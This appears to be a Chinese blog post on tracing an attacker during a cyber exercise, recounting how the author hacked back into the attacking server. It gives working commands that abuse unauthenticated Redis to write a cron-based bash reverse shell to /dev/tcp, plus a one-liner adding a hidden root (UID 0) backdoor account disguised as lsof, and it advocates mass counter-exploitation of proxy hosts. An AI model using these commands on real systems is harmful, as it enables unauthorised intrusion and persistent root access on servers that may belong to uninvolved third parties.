分享工作之外有用的事情。

一、流量监测

流量中发现有IP持续在对公司资产进行攻击。

初步判断是有人使用扫描器在对公司资产进行攻击。

二、溯源信息

为了能找到更多攻击者的信息,首选是拿下攻击者的服务器。
我听取了大神的建议,使用goby进行初步的扫描,不用不知道,一用吓一跳。

这里吹一波goby,基于go内核,速度和效率有保证,UI优雅,采用 Electron+VUE 前端框架,跨平台,从扫描到打漏洞库,乃至生成报告,一条龙服务了。哈哈哈,废话少说,看结果。


不到5s,结果出来了,很明显,这里存在redis未授权访问,那就有突破口了。

三、拿下shell、root

redis未授权 getshell部分我遇到了一些小坎坷。

普通情况下是写入自己的ssh公钥,上传至redis服务器,添加至服务器的ssh公钥,就可以ssh直接登录。

但是当我开开心心一步步来做,最后一步发现redis save不了,百度了一波,发现是权限不够。


好吧,就知道没那么顺利。
那怎么办呢,我想到两个办法:
一、既然无法写数据到服务器ssh目录,那么我可以写入redis表中,反弹shell。
二、找到web目录,尝试看能不能把shell写入到web目录中。

当我访问该IP对应的网站时,我直接放弃第二个方法。别问为什么,问就是找不到,绝对不是我懒。

那就试试第二个方法。

redis-cli -h ip
>> set x "\n* * * * * bash -i >& /dev/tcp/接收shell的IP/8001 0>&1\n"
>> config set dir /var/spool/cron/
>> config set dbfilename root
>> save

一波操作下来,成功了。

shell成功反弹,但是这个时候是半交互式shell,操作起来实在是不方便。最好是我们自己创建一个管理员用户,如果用半交互式vim操作,甭提有多痛苦,这里分享一句话创建拥有root管理员的命令。

useradd -p `openssl passwd -1 -salt 'lsof' admin123` -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/lsof admin

admin123是密码,最后的admin是用户名。
如果useradd提示"bash: useradd: command not found"
直接

su -

然后再执行以上命令。

三、查找攻击者

我用自己创建的ssh账号登陆服务器后,查找.history和last等信息,不出意外,登陆信息和历史命令都被攻击者有意抹去了。

对比攻击时间和登录时间,可以看出来,发起攻击的时间段,登录信息都找不到与其对应。这更加肯定了这是台代理攻击机无疑。



好了,现在权限拿下了,但是任何线索没有,有些小郁闷。

后来我处于好奇,看看服务器redis有哪些数据,发现除了几个挖矿脚本之外,这个域名让我眼前一亮。

team red,很明显是红队。
后来经过goby扫描,发现这台服务器除了邮箱服务器,就是ftp服务。对应的钓鱼邮件、远程攻击payload下载,红队常用的套路,更加确定该台服务器是红队支持服务器性质。

看吧,还是疏漏了这一点,系统痕迹都抹去了,唯独漏掉了这点。

写在最后的总结:

  • 在实际护网和平时的攻防演练中,代理攻击机可能成千上万计数。蓝军面对海量的IP,需要做好一个系统,对所有IP批量进行信息收集,比如该IP开放了哪些端口,有没有用web服务,然后自动抓取web的title,并将所有这些信息进行统计整理成一张表格。最后定制策略和POC,批量的打回去,拿下大量的代理机之后,为进一步溯源提供信息。
  • 红队不易,面对waf、蜜罐、流量筛选,最后在最短时间内做好权限维持,都是重重挑战,但是我的最终目标是成为一名优秀的黑客,有挑战才有乐趣。
  • 针对第一点,蓝军对海量攻击的自动化信息收集,完全可以由工具实现,也包括POC的定制和选择。这就是我接下来的目标,一步步开发出实用性强、瞄准痛点的工具。

接下来演习结束,就要正式护网。
立一个flag,护网前,完成该工具的信息收集部分功能。

红蓝演习对抗之溯源篇相关推荐

  1. 你了解渗透测试与红蓝队对抗的区别吗?

    保护好企业的网络资产,做好防护工作,这日益成为了企业管理层重要的任务.企业和机构在这个方面投入了大量的资源和精力,部署了充分的软硬件措施.但由于缺乏黑样本数据.不同业务场景用同一套防护手段等原因,导致 ...

  2. 红蓝攻防对抗中需要掌握的网络安全技术汇总

    (一) 系统层漏洞利用与防护 为应对各种各样的网络攻击,操作系统内部有很多底层的安全机制.而每一种安全机制, 都对应了一定形式的网络攻击方法.对于白帽子来说,学习和掌握底层的系统安全机制,发 现程序或 ...

  3. 渗透测试和红蓝对抗是什么意思?有什么区别?

    在网络安全这个庞大的体系中,渗透测试.红蓝对抗是比较常见的专业名词,承担着非常重要的作用,那么什么是渗透测试.红蓝对抗?红蓝对抗和渗透测试有什么区别?小编通过这篇文章为大家介绍一下. 渗透测试 渗透测 ...

  4. 红蓝对抗-HW红蓝队基本知识

    第一章 什么是蓝队 蓝队,一般是指网络实战攻防演习中的攻击一方. 蓝队一般会采用针对目标单位的从业人员,以及目标系统所在网络内的软件.硬件设备同时执行多角度.全方位.对抗性的混合式模拟攻击手段:通过技 ...

  5. p82 红蓝对抗-蓝队atckDs蜜罐威胁情报

    数据来源 必备知识点: 在每年的安全活动中,红蓝队的职责,其中大部分强调学习红队技术,那么蓝队技术又有哪些呢?简要来说蓝队就是防守,涉及到应急.溯源.反制.情报等综合性认知和操作能力知识点.掌握红队攻 ...

  6. 浅谈大规模红蓝对抗攻与防

    文|腾讯蓝军 深夜饮酒 & leonc 编者按 蓝军(Blue Team)的价值是站在攻击者的位置从实战角度协助防守方发现问题,避免防守方在进行安全建设时以自我为中心纸上谈兵,所谓以攻促防是也 ...

  7. 红蓝对抗中的近源渗透

    前言 近源渗透是这两年常被安全业内人员谈起的热门话题.不同于其他虚无缥缈的安全概念,近源渗透涉及到的无线安全.物理安全.社会工程学都十分容易落地实践,许多企业内部的攻防对抗演练也都出现了看上去&quo ...

  8. 不能从远程创建com+对象_红蓝对抗攻防实战:寻找COM对象

    概述 渗透测试人员.红蓝对抗的蓝军(攻击方).恶意行动者经常会选择COM对象来实现横向移动.此前,一些安全研究人员陆续针对COM对象开展研究,包括Matt Nelson(enigma0x3)在2017 ...

  9. 红蓝对抗场景下的二三事

    背景 未知攻焉知防,警察想要抓小偷,就该先摸透小偷的想法,才能更快捷的抓到小偷毕竟小偷抓小偷更容易.网络安全的攻与防,好比"矛"与"盾",要想不被"矛 ...

最新文章

  1. Unity + SQL数据库创建管理玩家排行榜学习教程
  2. main函数的参数详解,它们是何时何处传入的?(main函数的参数值是从操作系统命令行上获得的)
  3. Ubuntu14-04安装redis和php5-redis扩展
  4. java窗口向mysql加信息_Java中如何实现向DBC方式向表中添加数据
  5. 计算机创造奇迹英语作文,高中英语作文模板 第274期:Creating Miracle 创造奇迹
  6. TensorFlow笔记(2) 常量与变量
  7. 利用vertical-align实现图片文字垂直居中对齐(HTML、CSS)
  8. UVALive 3401 彩色立方体
  9. markdown首行空两格
  10. 流程图软件Microsoft Visio
  11. Linux驱动开发-编写FT5X06触摸屏驱动
  12. 记一次成功修复U盘的痛苦经历
  13. DM6437的中断和事件
  14. 怎么让图片铺满手机屏幕_手机版Photoshop怎么把图片铺满屏幕?
  15. 【GA MTSP】基于matlab遗传算法求解多旅行商问题(同始终点)【含Matlab源码 1338期】
  16. 饱食沪深港澳22日-港:星级传统韩菜-梨花园~110207
  17. 出现这十种症状,说明你不适合干程序员
  18. [圣诞大礼]Macintosh苹果机精品游戏合集
  19. 扒一扒苹果的那些事儿—春节见闻随想
  20. 狸猫浏览器v2.0功能解析

热门文章

  1. 流镜像(华为S9306和S5700)
  2. 心理学角度教你如何左手画圆,右手画方
  3. python如何画贝塞尔曲线_Python使用matplotlib实现绘制自定义图形功能示例
  4. 在wps上使用Endnote
  5. 如何在WPS中启用WebDAV连接到穿越派·派盘
  6. zstd优秀的数据压缩算法,大数据小数据包
  7. 朴素贝叶斯关于naivebayes包核函数等
  8. vue实现调用showModalDialog传递参数
  9. 鲁大师发布2022年Q1报告,黑鲨5 Pro夺冠性能榜
  10. 【To be a better man】Timing(时机)---有想做的事情就赶快去做吧!